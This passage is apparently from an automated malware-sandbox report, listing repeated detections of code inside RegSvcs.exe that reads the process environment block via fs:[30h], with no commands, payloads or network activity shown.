            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2A470 mov eax, dword ptr fs:[00000030h]19_2_00F2A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8C460 mov ecx, dword ptr fs:[00000030h]19_2_00F8C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2245A mov eax, dword ptr fs:[00000030h]19_2_00F2245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBA456 mov eax, dword ptr fs:[00000030h]19_2_00FBA456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]19_2_00F3E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF645D mov eax, dword ptr fs:[00000030h]19_2_00EF645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A430 mov eax, dword ptr fs:[00000030h]19_2_00F3A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFC427 mov eax, dword ptr fs:[00000030h]19_2_00EFC427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFE420 mov eax, dword ptr fs:[00000030h]19_2_00EFE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFE420 mov eax, dword ptr fs:[00000030h]19_2_00EFE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFE420 mov eax, dword ptr fs:[00000030h]19_2_00EFE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]19_2_00F86420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F38402 mov eax, dword ptr fs:[00000030h]19_2_00F38402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F38402 mov eax, dword ptr fs:[00000030h]19_2_00F38402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F38402 mov eax, dword ptr fs:[00000030h]19_2_00F38402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F025E0 mov eax, dword ptr fs:[00000030h]19_2_00F025E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]19_2_00F2E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C5ED mov eax, dword ptr fs:[00000030h]19_2_00F3C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C5ED mov eax, dword ptr fs:[00000030h]19_2_00F3C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F065D0 mov eax, dword ptr fs:[00000030h]19_2_00F065D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A5D0 mov eax, dword ptr fs:[00000030h]19_2_00F3A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A5D0 mov eax, dword ptr fs:[00000030h]19_2_00F3A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E5CF mov eax, dword ptr fs:[00000030h]19_2_00F3E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E5CF mov eax, dword ptr fs:[00000030h]19_2_00F3E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F245B1 mov eax, dword ptr fs:[00000030h]19_2_00F245B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F245B1 mov eax, dword ptr fs:[00000030h]19_2_00F245B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F805A7 mov eax, dword ptr fs:[00000030h]19_2_00F805A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F805A7 mov eax, dword ptr fs:[00000030h]19_2_00F805A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F805A7 mov eax, dword ptr fs:[00000030h]19_2_00F805A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E59C mov eax, dword ptr fs:[00000030h]19_2_00F3E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F02582 mov eax, dword ptr fs:[00000030h]19_2_00F02582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F02582 mov ecx, dword ptr fs:[00000030h]19_2_00F02582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F34588 mov eax, dword ptr fs:[00000030h]19_2_00F34588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3656A mov eax, dword ptr fs:[00000030h]19_2_00F3656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3656A mov eax, dword ptr fs:[00000030h]19_2_00F3656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3656A mov eax, dword ptr fs:[00000030h]19_2_00F3656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08550 mov eax, dword ptr fs:[00000030h]19_2_00F08550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08550 mov eax, dword ptr fs:[00000030h]19_2_00F08550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]19_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]19_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]19_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]19_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]19_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]19_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]19_2_00F2E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]19_2_00F2E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]19_2_00F2E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]19_2_00F2E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]19_2_00F2E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F96500 mov eax, dword ptr fs:[00000030h]19_2_00F96500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]19_2_00FD4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]19_2_00F7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]19_2_00F7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]19_2_00F7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]19_2_00F7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F806F1 mov eax, dword ptr fs:[00000030h]19_2_00F806F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F806F1 mov eax, dword ptr fs:[00000030h]19_2_00F806F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A6C7 mov ebx, dword ptr fs:[00000030h]19_2_00F3A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A6C7 mov eax, dword ptr fs:[00000030h]19_2_00F3A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F366B0 mov eax, dword ptr fs:[00000030h]19_2_00F366B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C6A6 mov eax, dword ptr fs:[00000030h]19_2_00F3C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04690 mov eax, dword ptr fs:[00000030h]19_2_00F04690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04690 mov eax, dword ptr fs:[00000030h]19_2_00F04690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F32674 mov eax, dword ptr fs:[00000030h]19_2_00F32674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC866E mov eax, dword ptr fs:[00000030h]19_2_00FC866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC866E mov eax, dword ptr fs:[00000030h]19_2_00FC866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A660 mov eax, dword ptr fs:[00000030h]19_2_00F3A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A660 mov eax, dword ptr fs:[00000030h]19_2_00F3A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1C640 mov eax, dword ptr fs:[00000030h]19_2_00F1C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F36620 mov eax, dword ptr fs:[00000030h]19_2_00F36620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F38620 mov eax, dword ptr fs:[00000030h]19_2_00F38620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E627 mov eax, dword ptr fs:[00000030h]19_2_00F1E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0262C mov eax, dword ptr fs:[00000030h]19_2_00F0262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42619 mov eax, dword ptr fs:[00000030h]19_2_00F42619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]19_2_00F1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E609 mov eax, dword ptr fs:[00000030h]19_2_00F7E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F047FB mov eax, dword ptr fs:[00000030h]19_2_00F047FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F047FB mov eax, dword ptr fs:[00000030h]19_2_00F047FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8E7E1 mov eax, dword ptr fs:[00000030h]19_2_00F8E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F227ED mov eax, dword ptr fs:[00000030h]19_2_00F227ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F227ED mov eax, dword ptr fs:[00000030h]19_2_00F227ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F227ED mov eax, dword ptr fs:[00000030h]19_2_00F227ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0C7C0 mov eax, dword ptr fs:[00000030h]19_2_00F0C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F807C3 mov eax, dword ptr fs:[00000030h]19_2_00F807C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB47A0 mov eax, dword ptr fs:[00000030h]19_2_00FB47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F007AF mov eax, dword ptr fs:[00000030h]19_2_00F007AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA678E mov eax, dword ptr fs:[00000030h]19_2_00FA678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08770 mov eax, dword ptr fs:[00000030h]19_2_00F08770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]19_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00750 mov eax, dword ptr fs:[00000030h]19_2_00F00750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42750 mov eax, dword ptr fs:[00000030h]19_2_00F42750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42750 mov eax, dword ptr fs:[00000030h]19_2_00F42750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8E75D mov eax, dword ptr fs:[00000030h]19_2_00F8E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F84755 mov eax, dword ptr fs:[00000030h]19_2_00F84755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3674D mov esi, dword ptr fs:[00000030h]19_2_00F3674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3674D mov eax, dword ptr fs:[00000030h]19_2_00F3674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3674D mov eax, dword ptr fs:[00000030h]19_2_00F3674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7C730 mov eax, dword ptr fs:[00000030h]19_2_00F7C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3273C mov eax, dword ptr fs:[00000030h]19_2_00F3273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3273C mov ecx, dword ptr fs:[00000030h]19_2_00F3273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3273C mov eax, dword ptr fs:[00000030h]19_2_00F3273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C720 mov eax, dword ptr fs:[00000030h]19_2_00F3C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C720 mov eax, dword ptr fs:[00000030h]19_2_00F3C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00710 mov eax, dword ptr fs:[00000030h]19_2_00F00710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F30710 mov eax, dword ptr fs:[00000030h]19_2_00F30710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C700 mov eax, dword ptr fs:[00000030h]19_2_00F3C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C8F9 mov eax, dword ptr fs:[00000030h]19_2_00F3C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3C8F9 mov eax, dword ptr fs:[00000030h]19_2_00F3C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCA8E4 mov eax, dword ptr fs:[00000030h]19_2_00FCA8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2E8C0 mov eax, dword ptr fs:[00000030h]19_2_00F2E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD08C0 mov eax, dword ptr fs:[00000030h]19_2_00FD08C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8C89D mov eax, dword ptr fs:[00000030h]19_2_00F8C89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00887 mov eax, dword ptr fs:[00000030h]19_2_00F00887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F96870 mov eax, dword ptr fs:[00000030h]19_2_00F96870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F96870 mov eax, dword ptr fs:[00000030h]19_2_00F96870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8E872 mov eax, dword ptr fs:[00000030h]19_2_00F8E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8E872 mov eax, dword ptr fs:[00000030h]19_2_00F8E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F30854 mov eax, dword ptr fs:[00000030h]19_2_00F30854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04859 mov eax, dword ptr fs:[00000030h]19_2_00F04859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04859 mov eax, dword ptr fs:[00000030h]19_2_00F04859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F12840 mov ecx, dword ptr fs:[00000030h]19_2_00F12840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA483A mov eax, dword ptr fs:[00000030h]19_2_00FA483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA483A mov eax, dword ptr fs:[00000030h]19_2_00FA483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A830 mov eax, dword ptr fs:[00000030h]19_2_00F3A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]19_2_00F22835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]19_2_00F22835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]19_2_00F22835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22835 mov ecx, dword ptr fs:[00000030h]19_2_00F22835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]19_2_00F22835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]19_2_00F22835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8C810 mov eax, dword ptr fs:[00000030h]19_2_00F8C810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F329F9 mov eax, dword ptr fs:[00000030h]19_2_00F329F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F329F9 mov eax, dword ptr fs:[00000030h]19_2_00F329F9
